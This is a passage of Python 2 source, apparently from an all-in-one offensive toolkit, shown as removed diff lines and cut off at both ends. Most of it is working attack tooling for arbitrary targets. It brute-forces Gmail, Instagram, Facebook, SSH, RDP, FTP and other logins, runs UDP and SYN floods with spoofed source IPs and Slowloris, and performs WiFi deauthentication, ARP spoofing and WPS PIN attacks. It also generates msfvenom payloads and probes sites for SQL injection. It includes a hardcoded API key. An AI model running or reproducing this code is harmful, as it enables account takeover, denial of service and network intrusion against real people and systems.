option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -#--------------------# -#GMAIL BRUTEFORCE END# - -#PORT SCAN START# -#---------------# -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -#-------------# -#PORT SCAN END# - -#INSTAGRAM BRUTEFORCE START# -#--------------------------# -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -#------------------------# -#INSTAGRAM BRUTEFORCE END# - -#FACEBOOK BRUTEFORCE START# -#-------------------------# -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -#-----------------------# -#FACEBOOK BRUTEFORCE END# - -#HOST TO IP START# -#----------------# -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -#--------------# -#HOST TO IP END# - -#YOUR OWN IP START# -#-----------------# -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" -#---------------# -#YOUR OWN IP END# - - -#AUTOMATED WIFI HACK START# -#-------------------------# -def wifite(): - os.system("wifite") -#-----------------------# -#AUTOMATED WIFI HACK END# - - -#MONITOR MODE START# -#------------------# -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -#----------------# -#MONITOR MODE END# - - -#DEVICES IN THE NET START# -#------------------------# -def netdev(): - os.system("netdiscover") -#----------------------# -#DEVICES IN THE NET END# - - -#NETS AROUND YOU START# -#-----------------------# -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -#---------------------# -#NETS AROUND YOU END# - - -#INFO SCAN HOST START# -#--------------------# -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -#------------------# -#INFO SCAN HOST END# - - -#INFO ON YOUR SYSTEM START# -#-------------------------# -def sysinfo(): - os.system("iwconfig") - k = raw_input("Interface: ") - os.system("clear") - os.system("ifconfig") - print "\n" - os.system("iwconfig") - print "\n" - os.system("neofetch") - print "\n" - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" - print "\n" - show = 'macchanger -s {0}'.format(k) - os.system(show) -#-----------------------# -#INFO ON YOUR SYSTEM END# - - -#ALL METASPLOIT EXPLOITS START# -#-----------------------------# -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -#---------------------------# -#ALL METASPLOIT EXPLOITS END# - - -#UDP DOS START# -#-------------# -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -#-----------# -#UDP DOS END# - -#TCP FLOOD START# -#---------------# -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -#-------------# -#TCP FLOOD END# - - -#SYN FLOOD START# -#---------------# -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() -#-------------# -#SYN FLOOD END# - - -#PING A HOST START# -#-----------------# -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -#---------------# -#PING A HOST END# - - -#ALL METASPLOIT PAYLOADS START# -#-----------------------------# -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -#---------------------------# -#ALL METASPLOIT PAYLOADS END# - - -#ALL METASPLOIT AUX START# -#------------------------# -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -#----------------------# -#ALL METASPLOIT AUX END# - - -#START METASPLOIT HANDLER START# -#------------------------------# -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -#----------------------------# -#START METASPLOIT HANDLER END# - - -#ALL METASPLOIT MODS START# -#-------------------------# -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -#-----------------------# -#ALL METASPLOIT MODS END# - - -#HYDRA AUTOMATED START# -#---------------------# -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -#-------------------# -#HYDRA AUTOMATED END# - - -#WORDLIST MAKER START# -#--------------------# -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -#------------------# -#WORDLIST MAKER END# - - -#LIST FILES START# -#----------------# -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" -#--------------# -#LIST FILES END# - - -#MONITOR MODE OFF START# -#----------------------# -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -#--------------------# -#MONITOR MODE OFF END# - - -#TURN ON VPN START# -#-----------------# -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -#---------------# -#TURN ON VPN END# - - -#TURN OFF VPN START# -#------------------# -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -#----------------# -#TURN OFF VPN END# - - -#SLOW LORIS DOS START# -#--------------------# -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') -#------------------# -#SLOW LORIS DOS END# - - -#OPEN DOX WEBSITE START# -#----------------------# -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -#--------------------# -#OPEN DOX WEBSITE END# - - -#SCAN SPECIFIC NET START# -#-----------------------# -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -#---------------------# -#SCAN SPECIFIC NET END# - - -#DEFAULT WIFI PIN START# -#----------------------# -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -#--------------------# -#DEFAULT WIFI PIN END# - - -#WIFI PIN BRUTEFORCE START# -#-------------------------# -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -#-----------------------# -#WIFI PIN BRUTEFORCE END# - - -#DEAUTH ATTACK START# -#-------------------# -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -#-----------------# -#DEAUTH ATTACK END# - - -#MAC CHANGER START# -#-----------------# -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-----------------# -#MAC CHANGER START# - - -#MAC CHANGER OFF START# -#---------------------# -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-------------------# -#MAC CHANGER OFF END# - - -#ARP SPOOF START# -#---------------# -def arpspoof(): - print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" - h = raw_input("Targets: ") - os.system('echo "net.sniff on\n" >> arp.cap') - os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) - os.system('echo "arp.spoof on\n" >> arp.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet arp.cap") - os.system("rm arp.cap") -#-------------# -#ARP SPOOF END# - - -#SSL SCAN START# -#--------------# -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -#------------# -#SSL SCAN END# - - -#MAKE A PAYLOAD START# -#--------------------# -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - s = raw_input("File Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) - os.system(a) -#------------------# -#MAKE A PAYLOAD END# - - -#WORDLIST MAKER START# -#--------------------# -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -#------------------# -#WORDLIST MAKER END# - - -#INTERNET TRAFFIC START# -#----------------------# -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -#--------------------# -#INTERNET TRAFFIC END# - - -#RESET ACCOUNT PASSWORD START# -#----------------------------# -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -#--------------------------# -#RESET ACCOUNT PASSWORD END# - - -#RESET UNIX PASSWORD START# -#-------------------------# -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -#-----------------------# -#RESET UNIX PASSWORD END# - - -#FIND HASH TYPE START# -#--------------------# -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - 